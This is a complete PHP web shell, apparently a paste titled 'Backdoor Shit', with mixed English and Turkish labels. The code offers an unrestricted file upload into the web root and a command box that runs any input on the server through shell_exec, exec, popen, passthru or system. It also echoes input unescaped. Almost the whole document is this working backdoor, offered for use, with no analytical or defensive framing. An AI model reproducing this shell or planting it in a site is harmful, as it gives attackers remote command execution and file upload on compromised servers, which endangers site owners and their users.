Backdoor Shit

1.    
2. <!DOCTYPE html>
3. <html lang="en">
4. <head>
5.     <meta charset="UTF-8">
6.     <meta http-equiv="X-UA-Compatible" content="IE=edge">
7.     <meta name="viewport" content="width=device-width, initial-scale=1.0">
8.     <title>File Uploader</title>
9. </head>
10. <body>
11.     <span style="display:none">Vuln!!</span>
12.     <form method="post" enctype="multipart/form-data">
13.         <strong>Select a file to upload :</strong> <input type="file" name="upload" />
14.         <br /><br/>
15.         <button type="submit" name="upload_btn" style="border:none;background:#000;color:#fff;padding:5px 10px;font-weight:bold;height:50px;cursor:pointer;">Upload the fucking shit</button>
16.         <br /> <br/>
17.     </form>
18.     <form method="post">
19.         <strong>Run Command (Komut Çalıştır): </strong><input type="text" name="cmd" placeholder="whoami" value="<?=$_POST['cmd'];?>" style="width:400px;border:1px solid #efefef;padding:5px 10px;height:40px" />
20.         <br /><br />
21.         <button type="submit" name="run_cmd" style="border:none;background:#000;color:#fff;padding:5px 10px;font-weight:bold;height:50px;cursor:pointer;">Run command</button>
22.         <br/><br/>
23.     </form>
24. </body>
25. </html>
26. <?php
27.     if(isset($_POST["upload_btn"])){
28.         if(@move_uploaded_file($_FILES["upload"]["tmp_name"],$_FILES["upload"]["name"])){
29.             print "File is uploaded,check it: <a href=\"{$_FILES["upload"]["name"]}\">{$_FILES["upload"]["name"]}</a>";
30.         }else{
31.             print "Can not upload the file!";
32.         }
33.     }elseif(isset($_POST["run_cmd"])){
34.  
35.         $cmd = $_POST["cmd"];
36.  
37.         if(function_exists("shell_exec")){
38.             $run = shell_exec($cmd);
39.             echo "<font color=\"red\">Kullanılan işlev : shell_exec() </font>, <strong>Gönderilen Komut : $cmd</strong><br /><pre>$run</pre>";
40.         }elseif(function_exists("exec")){
41.             $run = exec($cmd,$result);
42.             echo "<font color=\"red\">Kullanılan işlev : exec() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
43.             foreach($result as $res){
44.                 $res = trim($res);
45.                 echo "<strong>exec-> $res</strong><br />";
46.             }
47.         }elseif(function_exists("popen")){
48.             $run = popen($cmd,"r");
49.             $result = "";
50.             echo "<font color=\"red\">Kullanılan işlev : popen() </font>, <strong>Gönderilen Komut : $cmd</strong><br /><br/>";
51.             while(!feof($run)){
52.                 $buffer = fgets($run,4096);
53.                 $result .= "<strong>popen -> $buffer</strong><br />";
54.             }
55.             pclose($run);
56.             echo $result;
57.         }elseif(function_exists("passthru")){
58.             passthru($cmd);
59.             echo "<br /><br /><br /><font color=\"red\">Kullanılan işlev : passthru() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
60.         }elseif(function_exists("system")){
61.             system($cmd);
62.             echo "<br /><br /><br /><font color=\"red\">Kullanılan işlev : system() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
63.         }else{
64.             print "passthru(),shell_exec(),exec(),popen(),system() functions are disabled / Aktif değil!";
65.         }
66.  
67.     }
68. ?>